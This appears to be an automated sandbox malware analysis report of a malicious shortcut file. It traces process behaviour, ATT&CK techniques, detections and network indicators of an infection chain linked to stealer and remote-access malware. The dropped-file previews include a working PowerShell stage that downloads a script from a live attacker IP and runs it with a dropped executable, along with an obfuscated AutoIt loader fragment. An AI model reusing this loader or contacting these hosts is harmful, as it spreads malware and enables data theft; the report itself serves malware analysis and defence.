Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ED8BF4 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,wcscat,wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,wcscpy,11_2_00007FF7C0ED8BF4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EB2BCF GetUserNameW,11_2_00007FF7C0EB2BCF
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Code function: 11_2_00007FF7C0E92400 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,11_2_00007FF7C0E92400
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Code function: 11_2_00007FF7C0E71D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,11_2_00007FF7C0E71D80
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: powershell.exe, 00000012.00000002.2304075109.00000130E1738000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Users\Public\Guard.exe
Source: Guard.exe, 00000014.00000002.3290625854.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \Device\HarddiskVolume3\Users\Public\Guard.exe
Source: powershell.exe, 00000012.00000002.2304075109.00000130E1738000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Public\Guard.exe
Source: powershell.exe, 00000012.00000002.2493771492.00000130F99BC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2493519711.00000130F98A4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2493771492.00000130F99B0000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.2311307135.0000000000630000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.2307187837.0000000000630000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.2311555077.0000000000630000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.2299267768.0000000000630000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.2299116100.0000000000630000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.2315878838.0000000000630000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.2311423461.0000000000630000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.2303450017.0000000000630000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Guard.exe
Source: powershell.exe, 00000012.00000002.2299983775.00000130DF737000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 2C:\Users\Public\Guard.exe
Source: PefjSkkhb.exe, 0000000B.00000002.2238572807.000001A112952000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2299983775.00000130DF737000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2304075109.00000130E1558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2493771492.00000130F9A2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2488483129.00000130F9855000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2304075109.00000130E1738000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2493771492.00000130F99BC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2493771492.00000130F9A12000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, Guard.exe, 00000014.00000002.3290411307.0000000000B4F000.00000004.00000010.00020000.00000000.sdmp, Guard.exe, 00000014.00000002.3290411307.0000000000B5F000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: C:\Users\Public\Guard.exe
Source: PefjSkkhb.exe, 0000000B.00000003.2234945531.000001A112961000.00000004.00000020.00020000.00000000.sdmp, PefjSkkhb.exe, 0000000B.00000003.2234826761.000001A112959000.00000004.00000020.00020000.00000000.sdmp, PefjSkkhb.exe, 0000000B.00000002.2238682876.000001A112962000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \Public\Guard.exe
Source: powershell.exe, 00000012.00000002.2304075109.00000130E1738000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \Users\Public\Guard.exe
Source: SwiftWrite.pif Binary or memory string: WIN_81
Source: SwiftWrite.pif Binary or memory string: WIN_XP
Source: SwiftWrite.pif Binary or memory string: WIN_XPe
Source: SwiftWrite.pif Binary or memory string: WIN_VISTA
Source: PefjSkkhb.exe, 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: SwiftWrite.pif Binary or memory string: WIN_7
Source: SwiftWrite.pif Binary or memory string: WIN_8
Source: SwiftWrite.pif, 00000018.00000000.2421968201.0000000000346000.00000002.00000001.01000000.00000010.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Code function: 11_2_00007FF7C0EE3940 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,11_2_00007FF7C0EE3940
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Code function: 11_2_00007FF7C0EE4074 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,11_2_00007FF7C0EE4074
Source: C:\Users\Public\Guard.exe Code function: 20_2_0072696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,20_2_0072696E
Source: C:\Users\Public\Guard.exe Code function: 20_2_00726E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,20_2_00726E32
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 24_2_0030696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,24_2_0030696E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 24_2_00306E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,24_2_00306E32
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | 2 Valid Accounts | 2 Native API | 1 Scripting | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 21 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 12 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Email Collection | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 3 PowerShell | 2 Valid Accounts | 2 Valid Accounts | 2 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 21 Input Capture | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | 2 Registry Run Keys / Startup Folder | 21 Access Token Manipulation | 1 DLL Side-Loading | NTDS | 37 System Information Discovery | Distributed Component Object Model | 3 Clipboard Data | 23 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 12 Process Injection | 231 Masquerading | LSA Secrets | 151 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 2 Registry Run Keys / Startup Folder | 2 Valid Accounts | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 31 Virtualization/Sandbox Evasion | DCSync | 13 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 12 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
[Behavior graph, ID 1577196: sample duyba.lnk.download.lnk, start date 18/12/2024, architecture WINDOWS, score 100]

Source | Detection | Scanner | Label | Link
duyba.lnk.download.lnk | 20% | Virustotal | |
duyba.lnk.download.lnk | 16% | ReversingLabs | Shortcut.Trojan.ForExec |
Source | Detection | Scanner | Label | Link
C:\Users\Public\Guard.exe | 8% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\ghep2[1] | 55% | ReversingLabs | Win32.Trojan.LummaStealer |
C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | 8% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PefjSkkhb.exe | 32% | ReversingLabs | Win64.Adware.RedCap |
No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
tiffany-careers.com | 147.45.49.155 | true | true | | unknown
x1.i.lencr.org | unknown | unknown | false | | high
nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://tiffany-careers.com/Marketing.pdf | false | Avira URL Cloud: safe | unknown
http://139.99.188.124/kiiMf | true | Avira URL Cloud: safe | unknown
https://tiffany-careers.com/ghep2 | true | Avira URL Cloud: safe | unknown
http://139.99.188.124/QWCheljD.txt | true | Avira URL Cloud: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
139.99.188.124 | unknown | Canada | | 16276 | OVHFR | true
147.45.49.155 | tiffany-careers.com | Russian Federation | | 2895 | FREE-NET-ASFREEnetEU | true
IP
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1577196
Start date and time: 2024-12-18 09:12:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 30s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 26
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: duyba.lnk.download.lnk
Detection: MAL
Classification: mal100.expl.evad.winLNK@41/73@4/3
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 92
• Number of non-executed functions: 275
Cookbook Comments:
• Found application associated with file extension: .lnk
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 92.122.16.236, 23.218.208.109, 92.122.16.141, 172.64.41.3, 162.159.61.3, 50.16.47.176, 54.224.241.105, 34.237.241.83, 18.213.11.84, 23.32.238.18, 23.32.238.74, 23.195.39.65, 104.122.212.204, 23.32.239.56, 2.19.198.27, 52.6.155.20, 20.109.210.53, 13.107.246.63
• Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ssl.adobe.com.edgekey.net, armmf.adobe.com, geo2.adobe.com
• Execution Graph export aborted for target mshta.exe, PID 5060 because there are no executed function
• Execution Graph export aborted for target powershell.exe, PID 4308 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7480 because it is empty
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                Time | Type | Description
                                                03:13:00 | API Interceptor | 2x Sleep call for process: svchost.exe modified
                                                03:13:00 | API Interceptor | 1x Sleep call for process: mshta.exe modified
                                                03:13:01 | API Interceptor | 115x Sleep call for process: powershell.exe modified
                                                03:13:15 | API Interceptor | 2x Sleep call for process: AcroCEF.exe modified
                                                03:14:00 | API Interceptor | 1988x Sleep call for process: Guard.exe modified
                                                03:14:16 | API Interceptor | 983x Sleep call for process: SwiftWrite.pif modified
                                                09:13:24 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
                                                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                139.99.188.124 | FwR7as4xUq.exe | malicious | Unknown | 139.99.188.124/EPDjSfs.txt
                                                No context
                                                Match | Associated Sample Name / URL | Detection | Threat Name
                                                C:\Users\Public\Guard.exe | c2.hta | malicious | XWorm
                                                C:\Users\Public\Guard.exe | c2.hta | malicious | XWorm
                                                C:\Users\Public\Guard.exe | c2.hta | malicious | XWorm
                                                C:\Users\Public\Guard.exe | c2.hta | malicious | XWorm
                                                C:\Users\Public\Guard.exe | FwR7as4xUq.exe | malicious | Unknown
                                                C:\Users\Public\Guard.exe | InsertSr.exe | malicious | GO Backdoor
                                                C:\Users\Public\Guard.exe | vqMMwqCFZQ.exe | malicious | Unknown
                                                C:\Users\Public\Guard.exe | fT0L8msd6q.exe | malicious | Unknown
                                                C:\Users\Public\Guard.exe | fT0L8msd6q.exe | malicious | Unknown
                                                C:\Users\Public\Guard.exe | qaHUaPUib8.exe | malicious | Unknown
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):1310720
                                                                    Entropy (8bit):0.8307030598410583
                                                                    Encrypted:false
                                                                    SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugn:gJjJGtpTq2yv1AuNZRY3diu8iBVqFN
                                                                    MD5:00D7269F86C88D5284BAEB91E066EDBD
                                                                    SHA1:D45BAE70275A2CD1B92FFD8F88452FEC592B3493
                                                                    SHA-256:7ADD2080CC3541E7117075A39514FA85FE0B25C45717EC978486E29FC9C91DC4
                                                                    SHA-512:1FE0CF65611B666FFCE569254BDDC6F9CAFE68D293EA30520C265751D851412C28F8BAEAA12096157A85F3DA16AD1388CBE70B4C50AECF4BBFC6E210D202A6A2
                                                                    Malicious:false
                                                                    Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x44575946, page size 16384, DirtyShutdown, Windows version 10.0
                                                                    Category:dropped
                                                                    Size (bytes):1310720
                                                                    Entropy (8bit):0.6585314709485202
                                                                    Encrypted:false
                                                                    SSDEEP:1536:hSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:haza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                    MD5:A2A8F1C0F18866236C9859BB5B6E9AA1
                                                                    SHA1:0AF3171C68BD47E46EEFF1E3B55A40F24BB4C377
                                                                    SHA-256:E867C96085EA118E8C39E77A1B24A5E0A964BA7F947802DD39E20DC17035A90A
                                                                    SHA-512:020A2DDE252D13E4DF69817A93266064DEE59DAB6FBE20E8EBB7E9C755B43326DF370C80493D6BC1DA84BC26CC4AAB46FDC23B9B23237B333A9B175D653345E0
                                                                    Malicious:false
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):16384
                                                                    Entropy (8bit):0.07919980021070322
                                                                    Encrypted:false
                                                                    SSDEEP:3:Zll/EYeSwZKRtGuAJkhvekl14+QXAllrekGltll/SPj:ZXEz3KRtrxl6fXAJe3l
                                                                    MD5:8068A6E02EF37BA86796922341C9FC00
                                                                    SHA1:FCF72A390A20322CB6DDDC47B309656B17A8556B
                                                                    SHA-256:E38BD036D97063BC3E1A928BB58D4B9CA398B09314F58F04D9F7A2B19B30FEEA
                                                                    SHA-512:74C6D4C9D8F32BCAA2A33651DD5F131BB2508D82CC8DAF63300014490907945C784C614EE0F8A411777CB11977D3CCC8A0B0D564F3D7E8C6B66DF5BBF3F0F4DC
                                                                    Malicious:false
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):893608
                                                                    Entropy (8bit):6.62028134425878
                                                                    Encrypted:false
                                                                    SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                    MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                    SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                    SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                    SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                    Joe Sandbox View:
                                                                    • Filename: c2.hta, Detection: malicious, Browse
                                                                    • Filename: c2.hta, Detection: malicious, Browse
                                                                    • Filename: c2.hta, Detection: malicious, Browse
                                                                    • Filename: c2.hta, Detection: malicious, Browse
                                                                    • Filename: FwR7as4xUq.exe, Detection: malicious, Browse
                                                                    • Filename: InsertSr.exe, Detection: malicious, Browse
                                                                    • Filename: vqMMwqCFZQ.exe, Detection: malicious, Browse
                                                                    • Filename: fT0L8msd6q.exe, Detection: malicious, Browse
                                                                    • Filename: fT0L8msd6q.exe, Detection: malicious, Browse
                                                                    • Filename: qaHUaPUib8.exe, Detection: malicious, Browse
                                                                    Process:C:\Users\user\AppData\Roaming\PefjSkkhb.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):486
                                                                    Entropy (8bit):5.264402695461477
                                                                    Encrypted:false
                                                                    SSDEEP:12:f73/oomFEoFnV/9LBzFj0zUQbnRS6SxJMnCPTFM:f73/UCknZ9LzjYnRSb8Cba
                                                                    MD5:AA25D3FDAD1F106B38D0FC6EF7812219
                                                                    SHA1:1811C03BBAD3B7ED95835D4CC6D43C664C1B4A5B
                                                                    SHA-256:6CC303DD32C6F3629ACD59CFB6219D30D504AC12BBA0AFD87F38012E211496E0
                                                                    SHA-512:ED1809238957DAF71ADB4F3D0996D9CD51431AC0FB04180F4FEB5A4FE51CF07F95F935D8F56863B019AFAB737E03BE5E2E687FEB8C0416F4E470E40A282EC566
                                                                    Malicious:true
                                                                    Preview:[string]$fU5L = "http://139.99.188.124/QWCheljD.txt"..[string]$oF6L = "C:\Users\Public\Secure.au3"..[string]$exePath = "C:\Users\Public\Guard.exe"....# Download the content from the URL..$wResp = New-Object System.Net.WebClient..$fCont = $wResp.DownloadString($fU5L)....# Save the downloaded content to the output file..Set-Content -Path $oF6L -Value $fCont -Encoding UTF8....# Run the executable with the output file as an argument..Start-Process -FilePath $exePath -ArgumentList $oF6L
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1266)
                                                                    Category:dropped
                                                                    Size (bytes):1240103
                                                                    Entropy (8bit):5.144317310151777
                                                                    Encrypted:false
                                                                    SSDEEP:12288:28V+jcfSgyuH7Kixj+UXk8pL6OvsEmeXBWD4LkPq0e718m3UDd:qcB7HxicaEmEQD3I1jUZ
                                                                    MD5:5FD6DCD6015C6F3F00D18BE2CE75691F
                                                                    SHA1:63007CCA9ED6C2A903AA30B6FA00EB280D4879A2
                                                                    SHA-256:044C72C01C72338F3559D098BEBF9D251F911B9FF41DD958EB80D8F7C9583C31
                                                                    SHA-512:29DFDE6DBE2BDA1F6FBC7FACD06B9F66BED01BC5C01ECEFC6C35DE0A49D905869ADFFBC89B9934650CC6D28C3F0377FC6BE4CE25F92D54646A909DFAD7282219
                                                                    Malicious:true
                                                                    Preview:.Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):291
                                                                    Entropy (8bit):5.18942072479918
                                                                    Encrypted:false
                                                                    SSDEEP:6:7Bn8q2P92nKuAl9OmbnIFUt8OBnEfrZmw+OBnEyPkwO92nKuAl9OmbjLJ:7Kv4HAahFUt8Ouz/+OuO5LHAaSJ
                                                                    MD5:2C7E1F46F63FCCF908C5CA3D3063A59A
                                                                    SHA1:BFEB98C597B220052A861F67F9AF641B2B335B68
                                                                    SHA-256:6389E1E0E9BAC09E13C2755AAD581537040AEF23EDB77A29181579F34CAB21FA
                                                                    SHA-512:20C9081E2F246BC430834763E8A104AF4D6F8BE6A2B577E8308CB3016598B49A6F838B55E2B0000592E78600143B30E0CAD4EF66FABC5483444B8492F1886F6D
                                                                    Malicious:false
                                                                    Preview:2024/12/18-03:13:04.648 b04 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/18-03:13:04.650 b04 Recovering log #3.2024/12/18-03:13:04.651 b04 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):338
                                                                    Entropy (8bit):5.1799879805949
                                                                    Encrypted:false
                                                                    SSDEEP:6:7BnNFlyq2P92nKuAl9Ombzo2jMGIFUt8OBnJ01Zmw+OBnJiRkwO92nKuAl9Ombzz:7FIv4HAa8uFUt8O/01/+O/W5LHAa8RJ
                                                                    MD5:09778B33D48D1B290686CB76D493D5C9
                                                                    SHA1:5A3F9B8F4E3C6513F78981DD29673EDAD03B9C21
                                                                    SHA-256:A03EE9F16617F85017D699F59BF2EC97E4C1F2A8491F520C54B1996272A2FF9F
                                                                    SHA-512:E71CDACF4D765C8435051244AB4AD91C2B490AB51B0C90C67AE8C1E519FC53DDDC51046A81BBF4A3336B714D60E74812778ABA33ED1E782919FE4CF8A6DE3017
                                                                    Malicious:false
                                                                    Preview:2024/12/18-03:13:04.757 1c14 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/18-03:13:04.758 1c14 Recovering log #3.2024/12/18-03:13:04.758 1c14 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):508
                                                                    Entropy (8bit):5.047195090775108
                                                                    Encrypted:false
                                                                    SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                                                                    MD5:70321A46A77A3C2465E2F031754B3E06
                                                                    SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                                                                    SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
                                                                    SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                                                                    Malicious:false
                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:JSON data
                                                                    Category:modified
                                                                    Size (bytes):508
                                                                    Entropy (8bit):5.064657227395732
                                                                    Encrypted:false
                                                                    SSDEEP:12:YH/um3RA8sqjQDsBdOg2H5DAcaq3QYiubxnP7E4TfF+:Y2sRdsnEdMH5X3QYhbxP7np+
                                                                    MD5:F53F35C861996E37E7E33A28CC225A2C
                                                                    SHA1:1730B6DED15C3B5315C65A2BF439EDD25CE66E6D
                                                                    SHA-256:3571A84C17EC26D9AD9E154C5343A31073B756C86349C13BFB7FA43EB720283E
                                                                    SHA-512:2C90932F33347AA371121D01B5D76FEEC249A02075B1CE3142507E76074A5D8438420B3CD2EAB548A90F6ED9509A14CB0F33CA3AEF81D85726AC2F015C9E225F
                                                                    Malicious:false
